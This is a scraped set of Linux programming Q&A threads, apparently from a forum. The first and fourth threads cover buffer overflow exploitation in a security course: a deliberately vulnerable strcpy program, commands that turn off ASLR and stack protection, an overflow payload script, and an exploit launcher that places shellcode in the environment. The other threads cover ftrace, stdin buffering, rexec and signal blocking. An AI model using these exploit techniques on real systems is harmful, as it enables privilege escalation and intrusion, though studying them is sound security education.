Why does my RIP value change after overwriting via an overflow? - security

I've been working on a buffer overflow on a 64 bit Linux machine for the past few days. The code I'm attacking takes in a file. This original homework ran on a 32-bit system, so a lot is differing. I thought I'd run with it and try to learn something new along the way. I set sudo sysctl -w kernel.randomize_va_space=0 and compiled the program below gcc -o stack -z execstack -fno-stack-protector stack.c && chmod 4755 stack
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
I could get it to crash by making a file with 20 "A"s. I made a small script to help.
#!/usr/bin/bash
python -c 'print("A"*20)' | tr -d "\n" > badfile
So now, if I add 6 "B"s to the mix after hitting the SIGSEGV in gbd I get.
RIP: 0x424242424242 ('BBBBBB')
0x0000424242424242 in ?? ()
Perfect! Now we can play with the RIP and put our address in for it to jump to! This is where I'm getting a little confused.
I added some C's to the script to try to find a good address to jump to
python -c 'print("A"*20 + "B"*6 + C*32)' | tr -d "\n" > badfile
after creating the file and getting the SEGFAULT my RIP address is no longer our B's
RIP: 0x55555555518a (<bof+37>: ret)
Stopped reason: SIGSEGV
0x000055555555518a in bof (
str=0x7fffffffe900 'C' <repeats 14 times>)
at stack.c:16
I thought this might be due to using B's, so I went ahead and tried to find an address. I then ran x/100 $rsp in gbd, but it looks completely different than before without the Cs
# Before Cs
0x7fffffffe8f0: 0x00007fffffffec08 0x0000000100000000
0x7fffffffe900: 0x4141414141414141 0x4141414141414141
0x7fffffffe910: 0x4242424241414141 0x0000000000004242
# After Cs
0x7fffffffe8e8: "BBBBBB", 'C' <repeats 32 times>
0x7fffffffe90f: "AAAAABBBBBB", 'C' <repeats 32 times>
0x7fffffffe93b: ""
I've been trying to understand why this is happening. I know after this I can supply an address plus code to get a shell like so
python -c 'print("noOPs"*20 + "address" + "shellcode")' | tr -d "\n" > badfile
The only thing that has come to mind is the buffer size? I'm not too sure, though. Any help would be great. Doing this alone without help has made me learn a lot. I'm just dying to create a working exploit!

Related

ftrace: system crash when changing current_tracer from function_graph via echo

I have been playing with ftrace recently to monitor some behavior characteristics of my system. I've been handling switching the trace on/off via a small script. After running the script, my system would crash and reboot itself. Initially, I believed that there might be an error with the script itself, but I have since determined that the crash and reboot is a result of echoing some tracer to /sys/kernel/debug/tracing/current_tracer when current_tracer is set to function_graph.
That is, the following sequence of commands will produce the crash/reboot:
echo "function_graph" > /sys/kernel/debug/tracing/current_tracer
echo "function" > /sys/kernel/debug/tracing/current_tracer
Durning the reboot after the crash caused by the above echo statements, I see a lot of output that reads:
clearing orphaned inode <inode>
I tried to reproduce this problem by replacing the current_tracer value from function_graph to something else in a C program:
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
int openCurrentTracer()
{
int fd = open("/sys/kernel/debug/tracing/current_tracer", O_WRONLY);
if(fd < 0)
exit(1);
return fd;
}
int writeTracer(int fd, char* tracer)
{
if(write(fd, tracer, strlen(tracer)) != strlen(tracer)) {
printf("Failure writing %s\n", tracer);
return 0;
}
return 1;
}
int main(int argc, char* argv[])
{
int fd = openCurrentTracer();
char* blockTracer = "blk";
if(!writeTracer(fd, blockTracer))
return 1;
close(fd);
fd = openCurrentTracer();
char* graphTracer = "function_graph";
if(!writeTracer(fd, graphTracer))
return 1;
close(fd);
printf("Preparing to fail!\n");
fd = openCurrentTracer();
if(!writeTracer(fd, blockTracer))
return 1;
close(fd);
return 0;
}
Oddly enough, the C program does not crash my system.
I originally encountered this problem while using Ubuntu (Unity environment) 16.04 LTS and confirmed it to be an issue on the 4.4.0 and 4.5.5 kernels. I have also tested this issue on a machine running Ubuntu (Mate environment) 15.10, on the 4.2.0 and 4.5.5 kernels, but was unable to reproduce the issue. This has only confused me further.
Can anyone give me insight on what is happening? Specifically, why would I be able to write() but not echo to /sys/kernel/debug/tracing/current_tracer?
Update
As vielmetti pointed out, others have had a similar issue (as seen here).
The ftrace_disable_ftrace_graph_caller() modifies jmp instruction at
ftrace_graph_call assuming it's a 5 bytes near jmp (e9 ).
However it's a short jmp consisting of 2 bytes only (eb ). And
ftrace_stub() is located just below the ftrace_graph_caller so
modification above breaks the instruction resulting in kernel oops on
the ftrace_stub() with the invalid opcode like below:
The patch (shown below) solved the echo issue, but I still do not understand why echo was breaking previously when write() was not.
diff --git a/arch/x86/kernel/mcount_64.S b/arch/x86/kernel/mcount_64.S
index ed48a9f465f8..e13a695c3084 100644
--- a/arch/x86/kernel/mcount_64.S
+++ b/arch/x86/kernel/mcount_64.S
## -182,7 +182,8 ## GLOBAL(ftrace_graph_call)
jmp ftrace_stub
#endif
-GLOBAL(ftrace_stub)
+/* This is weak to keep gas from relaxing the jumps */
+WEAK(ftrace_stub)
retq
END(ftrace_caller)
via https://lkml.org/lkml/2016/5/16/493
Looks like you are not the only person to notice this behavior. I see
https://lkml.org/lkml/2016/5/13/327
as a report of the problem, and
https://lkml.org/lkml/2016/5/16/493
as a patch to the kernel that addresses it. Reading through that whole thread it appears that the issue is some compiler optimizations.

One file input to two program in script

Hi I have a script that run two program
#Script file
./prog1
./prog2
prog1 is a C program
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv){
printf("prog1 running\n");
int tmp;
scanf("%d", &tmp);
printf("%d\n", tmp+10);
printf("prog1 ended\n");
return 0;
}
prog 2 is a C program as well
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv){
printf("prog2 running\n");
int tmp;
scanf("%d\n", &tmp);
printf("%d\n", tmp+10);
printf("prog2 ended\n");
return 0;
}
I run the command
./script < file
where file is
123
456
The output is
prog1 running
133
prog1 ended
prog2 running
10
prog2 ended
It seems like prog2 did not get the input from file, what is happening under the hood?
Will it be possible that prog2 took "\n" instead of a number?
Your script should be this:
#!/bin/bash
exec 3<&1
tee >(./prog2 >&3) | ./prog1
This use the tee command to duplicate stdin and the recent >() bash feature to open a temporary filedescriptor. (the use of filedesriptor 3 is done to split the stdout without parallelism).
See this answer to read the whole story.
scanf reads buffered input. So when your first program reads from stdin, it speculatively reads ahead all the available input to make future reads from stdin faster (through avoiding having to make so many system calls). When the second program runs, there's no input left, and (since you failed to check the result of scanf()) you end up with 0 in tmp.
You should be able to modify the buffering strategy in your application (at the expense of speed) using the setvbuf() standard function.

Computing memory address of the environment within a process

I got the following code from the lecture-slides of a security course.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
extern char shellcode;
#define VULN "./vuln"
int main(int argc, char **argv) {
void *addr = (char *) 0xc0000000 - 4
- (strlen(VULN) + 1)
- (strlen(&shellcode) + 1);
fprintf(stderr, "Using address: 0x%p\n", addr);
// some other stuff
char *params[] = { VULN, buf, NULL };
char *env[] = { &shellcode, NULL };
execve(VULN, params, env);
perror("execve");
}
This code calls a vulnerable program with the shellcode in its environment. The shellcode is some assembly code in an external file that opens a shell and VULN defines the name of the vulnerable program.
My question: how is the shellcode address is computed
The addr variable holds the address of the shellcode (which is part of the environment). Can anyone explain to me how this address is determined? So:
Where does the 0xc0000000 - 4 come from?
Why is the length of the shellcode and the programname substracted from it?
Note that both this code and the vulnerable program are compiled like this:
$ CFLAGS="-m32 -fno-stack-protector -z execstack -mpreferred-stack-boundary=2"
$ cc $CFLAGS -o vuln vuln.c
$ cc $CFLAGS -o exploit exploit.c shellcode.s
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
So address space randomization is turned off.
I understood that the stack is the first thing inside the process (highest memory address). And the stack contains, in this order:
The environment data.
argv
argc
the return address of main
the framepointer
local variables in main
...etc...
Constants and global data is not stored on the stack, that's why I also don' t understand why the length of the VULN constant influence the address at which the shellcode is placed.
Hope you can clear this up for me :-)
Note that we're working with a unix system on a intel x86 architecture

Random errors when using rexec

I have a very odd error when using rexec. The code is very simple, I am just calling rexec in a loop:
#include <stdio.h>
#include <errno.h>
#include <netdb.h>
int main() {
char buffData[1024];
int i;
ssize_t j;
char * l_ahost = "cwp01";
struct servent * l_servInfo = getservbyname("exec", "tcp");
for (i = 0; i < 2000; i++) {
int err = rexec(&l_ahost, l_servInfo->s_port, NULL, NULL, "echo -n .", NULL);
if (err <= 0) {
perror("Rexec error");
} else {
if (read(err, buffData, 1024) > 0) printf ("'%c' %d\n", *buffData, i);
close(err);
}
}
return 0;
}
The output is:
muftak : > gcc tst_rexec.c ; ./a.out
'.' 0
'.' 1
'.' 2
'.' 3
'.' 4
...
'.' 47
'.' 48
'.' 49
cwp01.eurocontrol.fr: Connection reset by peer
Rexec error: Illegal seek
'.' 51
'.' 52
'.' 53
'.' 54
...
Why does rexec work correctly almost always, but not always ? Non determinist behaviour for such a simple case disturbs me a lot. I have no clue of where to search an explanation for this (except stackoverflow, of course).
I am using Red Hat Enterprise Linux Server release 5.8 (Tikanga)
i don't know that much about TCP and even less about rexec. have you tried the command version yet. your code suggests you could use the rexec (1) as opposed to rexec (3).
good luck.
First, you should read the man page for rexec to know why you must not use it.
Second, "non determinist behaviour" is quite common in network programming (and it is a big difference with local programming and a reason why fully distributed systems, where you do not even know that code is run remotely, is very hard to achieve). From the error message, it looks like the server cwp01.eurocontrol.fr simply rebooted during your test.

Externally disabling signals for a Linux program

On Linux, is it possible to somehow disable signaling for programs externally... that is, without modifying their source code?
Context:
I'm calling a C (and also a Java) program from within a bash script on Linux. I don't want any interruptions for my bash script, and for the other programs that the script launches (as foreground processes).
While I can use a...
trap '' INT
... in my bash script to disable the Ctrl C signal, this works only when the program control happens to be in the bash code. That is, if I press Ctrl C while the C program is running, the C program gets interrupted and it exits! This C program is doing some critical operation because of which I don't want it be interrupted. I don't have access to the source code of this C program, so signal handling inside the C program is out of question.
#!/bin/bash
trap 'echo You pressed Ctrl C' INT
# A C program to emulate a real-world, long-running program,
# which I don't want to be interrupted, and for which I
# don't have the source code!
#
# File: y.c
# To build: gcc -o y y.c
#
# #include <stdio.h>
# int main(int argc, char *argv[]) {
# printf("Performing a critical operation...\n");
# for(;;); // Do nothing forever.
# printf("Performing a critical operation... done.\n");
# }
./y
Regards,
/HS
The process signal mask is inherited across exec, so you can simply write a small wrapper program that blocks SIGINT and executes the target:
#include <signal.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char *argv[])
{
sigset_t sigs;
sigemptyset(&sigs);
sigaddset(&sigs, SIGINT);
sigprocmask(SIG_BLOCK, &sigs, 0);
if (argc > 1) {
execvp(argv[1], argv + 1);
perror("execv");
} else {
fprintf(stderr, "Usage: %s <command> [args...]\n", argv[0]);
}
return 1;
}
If you compile this program to noint, you would just execute ./noint ./y.
As ephemient notes in comments, the signal disposition is also inherited, so you can have the wrapper ignore the signal instead of blocking it:
#include <signal.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char *argv[])
{
struct sigaction sa = { 0 };
sa.sa_handler = SIG_IGN;
sigaction(SIGINT, &sa, 0);
if (argc > 1) {
execvp(argv[1], argv + 1);
perror("execv");
} else {
fprintf(stderr, "Usage: %s <command> [args...]\n", argv[0]);
}
return 1;
}
(and of course for a belt-and-braces approach, you could do both).
The "trap" command is local to this process, never applies to children.
To really trap the signal, you have to hack it using a LD_PRELOAD hook. This is non-trival task (you have to compile a loadable with _init(), sigaction() inside), so I won't include the full code here. You can find an example for SIGSEGV on Phack Volume 0x0b, Issue 0x3a, Phile #0x03.
Alternativlly, try the nohup and tail trick.
nohup your_command &
tail -F nohup.out
I would suggest that your C (and Java) application needs rewriting so that it can handle an exception, what happens if it really does need to be interrupted, power fails, etc...
I that fails, J-16 is right on the money. Does the user need to interract with the process, or just see the output (do they even need to see the output?)
The solutions explained above are not working for me, even by chaining the both commands proposed by Caf.
However, I finally succeeded in getting the expected behavior this way :
#!/bin/zsh
setopt MONITOR
TRAPINT() { print AAA }
print 1
( ./child & ; wait)
print 2
If I press Ctrl-C while child is running, it will wait that it exits, then will print AAA and 2. child will not receive any signals.
The subshell is used to prevent the PID from being shown.
And sorry... this is for zsh though the question is for bash, but I do not know bash enough to provide an equivalent script.
This is example code of enabling signals like Ctrl+C for programs which block it.
fixControlC.c
#include <stdio.h>
#include <signal.h>
int sigaddset(sigset_t *set, int signo) {
printf("int sigaddset(sigset_t *set=%p, int signo=%d)\n", set, signo);
return 0;
}
Compile it:
gcc -fPIC -shared -o fixControlC.so fixControlC.c
Run it:
LD_LIBRARY_PATH=. LD_PRELOAD=fixControlC.so mysqld

Resources